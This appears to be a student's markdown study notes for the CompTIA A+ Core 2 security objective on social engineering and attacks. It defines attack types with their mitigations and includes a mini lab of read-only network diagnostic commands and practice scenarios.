kenpat/comptia-a-plus-core2
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
comptia-a-plus-core2/notes/SEC-5-social-engineering-attacks.md

7 KiB
Raw Blame History

SEC-5: Social Engineering and Attacks

Status: not started

Domain:

  • 2.0 Security

Objective alignment:

  • 2.5 Social engineering and attacks

What You Need To Know

This objective is scenario-heavy. The exam describes an attack and expects you to identify the type or best prevention.

Think in categories:

  • Human manipulation
  • Availability attacks
  • Spoofing/on-path attacks
  • Password attacks
  • Web app attacks
  • Insider/supply chain risks
  • Vulnerable systems

Memory Trick

Use PHISH-DOS-PASS-WEB-SUPPLY:

  • PHISH: phishing, vishing, smishing, QR phishing, spear phishing, whaling
  • DOS: DoS and DDoS
  • PASS: brute force, dictionary, plaintext passwords
  • WEB: SQL injection and XSS
  • SUPPLY: service provider, hardware, software supply chain

Physical/social trick:

  • Tailgating = no consent
  • Piggybacking = with consent

Phishing Variants

Phishing:

  • Fraud messages that trick users into clicking, logging in, paying, or sharing data.
  • Often uses spoofed email, fake sites, urgency, or suspicious links.

Vishing:

  • Voice phishing by phone or voicemail.

Smishing:

  • SMS/text phishing.

QR code phishing:

  • Malicious QR code points to a fake or harmful site.

Spear phishing:

  • Targeted phishing aimed at a specific person or group.

Whaling:

  • Spear phishing aimed at executives or high-value targets.

Business Email Compromise (BEC):

  • Attacker uses email trust to request money, gift cards, payroll changes, or wire transfers.
  • Prevention: verify requests through a separate trusted channel.

Physical/Social Attacks

Shoulder surfing:

  • Watching someone enter or view sensitive information.
  • Prevention: privacy screens, awareness, monitor placement.

Tailgating:

  • Unauthorized person follows through a secure door without consent.

Piggybacking:

  • Authorized person knowingly lets someone follow them in.

Impersonation:

  • Pretending to be someone trusted, such as help desk, vendor, executive, or employee.

Dumpster diving:

  • Searching trash for information useful in later attacks.
  • Prevention: shredding, secure disposal, clean desk policy.

Availability Attacks

DoS:

  • Denial of Service.
  • One system/attack source makes a service unavailable.

DDoS:

  • Distributed Denial of Service.
  • Many systems, often botnets, attack at once.

Prevention/mitigation:

  • ISP filtering
  • Cloud DDoS protection
  • Firewall/rate-limit patterns
  • Redundancy

Spoofing and On-Path Attacks

On-path attack:

  • Attacker intercepts/redirects traffic between victim and destination.
  • Formerly called man-in-the-middle.

ARP poisoning:

  • Local network attack that tricks devices about MAC-to-IP mappings.

Evil twin:

  • Fake Wi-Fi access point that looks legitimate.
  • Prevention: VPN, HTTPS, avoid unknown Wi-Fi, verify SSID, use enterprise authentication.

On-path browser attack:

  • Malware in the browser proxies or manipulates traffic from the victim's own machine.

Zero-Day Attacks

Zero-day:

  • Exploit for a vulnerability not yet known or patched by the vendor.

Exam clue:

  • No patch exists yet, or the vulnerability was unknown before exploitation.

Mitigation:

  • Defense in depth, least privilege, behavior detection, segmentation, rapid patching when fixes arrive.

Password Attacks

Plaintext password storage:

  • Passwords stored unencrypted.
  • Bad design.

Hashing:

  • One-way representation of a password.
  • Used for password storage.

Brute force:

  • Try every possible password combination.

Dictionary attack:

  • Try likely words/password lists and substitutions.

Mitigation:

  • Long passwords
  • MFA
  • Account lockout/rate limiting
  • Strong hashing
  • Password managers

Web App Attacks

SQL injection:

  • Attacker modifies database queries through unsafe input.
  • Example effect: view, change, or delete database data.
  • Prevention: input validation, parameterized queries, secure coding.

XSS:

  • Cross-site scripting.
  • Attacker injects scripts into trusted web pages or links.
  • Can steal cookies/session tokens or act as the user.
  • Prevention: input validation/output encoding, secure coding, browser updates.

Memory trick:

  • SQL injection attacks the database.
  • XSS attacks the user's browser trust.

Insider and Supply Chain

Insider threat:

  • Employee, contractor, or trusted person misuses access.
  • May be malicious or careless.

Supply chain attack:

  • Attacker compromises a vendor, provider, update, hardware, or software source.
  • Trusted relationship becomes the attack path.

Service provider risk:

  • Third-party providers may have access to internal systems.

Mitigation:

  • Vendor audits
  • Least privilege
  • Contract security requirements
  • Monitor provider access
  • Verify software signatures

Vulnerable Systems

Non-compliant systems:

  • Do not meet organization standards.

Unpatched systems:

  • Missing security updates.

Unprotected systems:

  • Security controls disabled or absent.

EOL/EOSL:

  • End of life/end of service life.
  • No normal security patches or support.

BYOD:

  • Bring Your Own Device.
  • User-owned device accessing company data.
  • Needs policy, MDM, data separation, and security requirements.

Commands To Enter

Windows:

arp -a

What it does:

  • Shows ARP cache entries.
  • Useful conceptually for ARP poisoning discussions.
netstat -ano

What it does:

  • Shows active network connections and listening ports.
ipconfig /all

What it does:

  • Shows IP, DNS, gateway, and adapter information.
whoami /groups

What it does:

  • Shows group membership and helps discuss insider/privilege risk.

Linux:

ip neigh

What it does:

  • Shows neighbor/ARP table entries.
ss -tulpn

What it does:

  • Shows listening sockets and processes when allowed.
ip route

What it does:

  • Shows routes, including default gateway.

Mini Lab

Goal:

  • Practice identifying attack types safely.

Windows:

  1. Run arp -a.
  2. Run netstat -ano.
  3. Run ipconfig /all.
  4. Record:
    • Default gateway:
    • One ARP entry:
    • One active/listening connection:

Linux:

  1. Run ip neigh.
  2. Run ss -tulpn.
  3. Run ip route.
  4. Record:
    • Default gateway:
    • One neighbor entry:
    • One listening service:

Scenario practice:

  1. A CFO gets an email asking for a wire transfer.
  2. A user scans a QR code on a parking meter and lands on a fake payment site.
  3. A fake Wi-Fi network copies the hotel SSID.
  4. An attacker tries every possible password.
  5. A vendor software update is compromised.
  6. A website search box runs attacker-supplied JavaScript.
  7. A database query is manipulated through form input.

For each:

  • Name the attack.
  • Name one prevention or mitigation.

Quick Check Before Quiz

You are ready for the SEC-5 quiz when you can answer these without looking:

  • What is the difference between phishing, vishing, smishing, spear phishing, and whaling?
  • What is the difference between tailgating and piggybacking?
  • What does an evil twin imitate?
  • What is the difference between SQL injection and XSS?
  • What is a supply chain attack?
  • What is the difference between DoS and DDoS?